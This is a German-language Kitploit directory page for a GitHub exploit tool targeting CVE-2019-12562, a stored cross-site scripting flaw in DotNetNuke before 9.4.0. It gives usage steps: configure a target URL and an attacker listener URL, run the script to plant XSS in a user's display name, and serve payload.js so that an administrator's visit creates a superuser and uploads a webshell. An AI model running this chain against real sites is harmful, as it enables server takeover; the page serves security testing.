Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-12562 — Gespeichertes Cross-Site Scripting in DotNetNuke (DNN) Version vor 9.4.0 | XSS zu RCE | Kitploit
Tools/GitHubGitHub/mayaseven/cve-2019-12562
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubmayaseven/cve-2019-12562

CVE-2019-12562

Gespeichertes Cross-Site Scripting in DotNetNuke (DNN) Version vor 9.4.0 | XSS zu RCE

Repository anzeigen
84vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-12562

CVE-2019-12562 Stored Cross-Site Scripting in DotNetNuke (DNN) Version vor 9.4.0 erlaubt es entfernten Angreifern, das bösartige Skript in der Admin-Benachrichtigungsseite zu speichern und einzubetten. Der Exploit könnte verwendet werden, um jede Aktion mit Administratorrechten durchzuführen, wie das Verwalten von Inhalten, das Hinzufügen von Benutzern, das Hochladen von Hintertüren auf den Server usw. Eine erfolgreiche Ausnutzung erfolgt, wenn ein Administrator eine Benachrichtigungsseite mit gespeichertem Cross-Site Scripting besucht.

Ausnutzung

  • Konfiguriere die Exploit-Datei
root@kitploit:~
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN"   # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
  • Führe den Exploit aus. Wenn das Ziel verwundbar ist, registriert der Exploit einen Dummy-Benutzer mit XSS im Feld "Display Name" und du erhältst payload.js.
root@kitploit:~
python3 CVE-2019-12562.py
  • Du musst den Webserver bereitstellen und payload.js darauf ablegen, um auf die Admin-Verbindung zu warten.
root@kitploit:~
python -m SimpleHTTPServer 1337

Dieser Exploit wird einen Superuser erstellen und eine Webshell auf dem Zielserver hochladen

Exploit-Bedingung: Eine erfolgreiche Ausnutzung erfolgt, wenn ein Administrator eine Benachrichtigungsseite besucht.

Weiterlesen: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ CVE-Referenz: https://www.cvedetails.com/cve/CVE-2019-12562/

Tool herunterladen